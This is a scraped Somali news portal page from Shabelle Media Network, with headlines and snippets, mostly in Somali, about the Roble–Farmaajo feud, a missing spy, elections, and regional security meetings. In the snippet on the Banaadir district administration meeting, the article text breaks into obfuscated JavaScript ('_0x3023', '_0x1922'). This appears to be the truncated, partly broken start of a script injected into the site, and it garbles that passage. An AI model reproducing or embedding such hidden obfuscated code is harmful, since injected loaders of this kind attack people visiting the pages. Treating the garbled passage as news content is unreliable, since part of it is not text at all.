Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Xal hordhac ah oo laga gaaray colaaddii deegaanka Kabxanley

Xabad joojin hordhac ah ayaa laga gaaray dagaalo culus ka dhacay deeganada Kabxanleey iyo Deefoow ee waqoyiga Magaalada Beledweyne. Waxgaradka iyo Odayaasha dhaqanka oo gaaray deegaanka Kabxanleey ayaa xal Hordhac ah ka gaaray Xiisadahaasi, Waxaana Amaanka Deegaanka Kabxanleey lagu wareejiyay inta xal kama dambeys ah laga gaarayo Ciidamada Guutada 5-aad Qeybta 27-aad ee Militariga xoogga dalka. Dadaalladan ayaa waxaa si weyn...

Somalia feud threatens to unleash renewed turmoil

With a long-running Islamist insurgency and elections delayed for months, Somalia is no stranger to instability, but the country now faces the risk of renewed violence because of an increasingly bitter stand-off between its president and prime minister. Here is a look at why relations between Prime Minister Mohamed Hussein Roble and President Mohamed Abdullahi Mohamed, alias Farmaajo, deteriorated so...

Case of missing spy aggravates tensions among fractious Somali leadership

The Somali prime minister, Mohamed Hussein Roble, has fired the head of the country’s intelligence unit over the disappearance of a female spy. Roble accused the spy chief, Fahad Yasin Haji Dahir, a former close ally of the president, of mixing politics and security and ordered him to hand over power within three days. He said the handling of the...

Marwada koobaad ee dalka oo la kulantay haweenka Musharixiinta ah

Marwada Koowaad ee Dalka Marwo Saynab Cabdi Macallin oo kulan la qaadatay qaar ka mid ah haweenka musharaxiinta ah ee Baarlamaanka Federaalka Soomaaliya ayaa tilmaamtay muhiimadda ay leedahay in wadajir loo xaqiijiyo qoondada Haweenka ee ka qeybgalka Baarlamaanka Federaalka Soomaaliya. Marwo Saynab Cabdi Macallin ayaa ku boorrisay haweenka musharaxiinta ah in ay is garab istaagaan si ay u xaqiijiyaan matalaad...

Maxaa looga hadlay shirka maamulada degmooyinka ee gobolka Banaadir?

Guddoomiyaha Gobolka Banaadir ahna Duqa Muqdisho Cumar Maxamuud Maxamed (Cumar Filish) ayaa Maanta shir guddoomiyay shirka Degmooyinka Gobolka Banaadir. Kulankaan ayaa waxaa goob-joog ka ahaa Gudoomiye ku-xigeenada Maamulka Gobolka Banaadir Xog hayaha guud Guddoomiyasha Degmooyinka iyo Saraakiisha Amniga. Kukankaa ayaa waxaa looga hadlay dar-dargalinta Aminga Caasimadda iyo u qidmeynta shacabka kunool Magaalada Muqdisho. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return...

Wasiirka cusub ee wasaaradda amniga oo maanta xilka la wareegay

Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa ka qeyb galay munaasabadda dhaarinta iyo xil wareejinta Wasiirka cusub ee Amniga Gudaha  Cabdullaahi Maxamed Nuur oo  uu xalay xilkaas u magacaabay Ra’iisul Wasaaruhu. Wasiirka Caddaaladda ee XFS Mudane Cabdulqaadir Maxamed Nuur ayaa dhaariyay wasiirka cusub. Ra’iisul Wasaare Rooble  ayaa wasiirka cusub kula dardaarmay in uu  si hufan u guto howsha muhiimka u...

Yoweri Museveni oo shaaciyey inuu ciidankiisa kala baxayo Soomaaliya

Madaxweynaha Uganda Yoweri Museveni ayaa ku hanjabay inuu ciidamadiisa kala baxayo Soomaaliya kadib markii uu soo cusboonaaday khilaaf soo kala dhexgalay Madaxweynaha Soomaaliya Maxamed Cabdullaahi Farmaajo iyo Ra'iisul Wasaare Maxamed Xuseen Rooble. Wareysi uu siiyay Frace24 oo oo hawada laga sii daayay Khamiista maanta ah ayuu Museveni ku sheegay inuu ka daalay murannada siyaasadeed ee aan dhammaadka lahayn ee ka...

Saciid Deni oo Gaalkacyo kula kulmay mas’uuliyiin ka tirsan Galmudug

Madaxweynaha Dowlad Goboleedka Puntland Mudane Siciid Cabdullaahi Deni, ayaa caawa kulan la qaatay masuuliyiin ka socda Dowlad Goboleedka Galmudug oo ka kooban Wasiiro, Saraakiil Ciidan iyo Guddoomiyeyaasha Gobolka iyo Degmada ee Galmudug. Kulanka ayaa waxaa looga hadlaya is-xogwareysi iyo sidii loo sii horumarinlaha Iskaashiga guuleystay ee labada dhinac, gaar ahaan amniga oo si wanaagsan looga shaqeeyay. Dowlad Goboleedyada Puntland iyo Galmudug...

Wararkii ugu dambeeyey doorashada HirShabelle ee Golaha Aqalka Sare

Guddiga doorashooyinka heer dowlad goboleed ee HirShabeelle ayaa soo saaray jawdalka doorashada xubnaha Aqalka Sare ee BFS ka soo gelaya HirShabeelle, taas oo la guda galayo maanta Khamiista, sida ku cad jadwalka. Ugu horeyn guddiga ayaa jadwalkaan ku sheegay in 9-ka bishan September oo maanta ku beegan illaa maalinka Sabtiga ah ee 11-ka bishaan ay socon doonto ‘qabashada araajida iyo...

Maxay ka wada-hadleen Ra’iisul wasaare Rooble iyo beesha caalamka?

Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya  Maxamed Xuseen Rooble ayaa kulan la qaatay qaar ka mid ah xubnaha Wakiillada Beesha Caalamka oo ay ka wada hadleen xaaladda dalka gaar ahaan arrimaha taagan ee saameynta ku leh amniga, siyaasadda iyo arrimaha geedi-socodka iyo dhammeystirka doorashooyinka. Wakiillada Beesha Caalamka ayaa muujiyay sida ay u taageersan yihiin habsami u fulinta howlaha doorashooyinka  ee uu...

WARAR KALE

African Union chief welcomes US-Iran peace deal, praises diplomacy

ADDIS ABABA, June 18 – African Union Commission Chairperson Mahmoud Ali Youssouf on Thursday welcomed a peace agreement reached between the United States and...

South West State leader meets Chinese ambassador to discuss development cooperation

MOGADISHU, June 18 – South West State President Sheikh Adan Mohamed Nur, known as Madoobe, held talks in Mogadishu with China's ambassador to Somalia,...

Somalia condemns Somaliland leader’s Israel visit, approves rights commission member

MOGADISHU, June 18 – Somalia's cabinet on Thursday condemned a visit by Somaliland leader Abdirahman Mohamed Abdullahi, known as Cirro, to what it described as...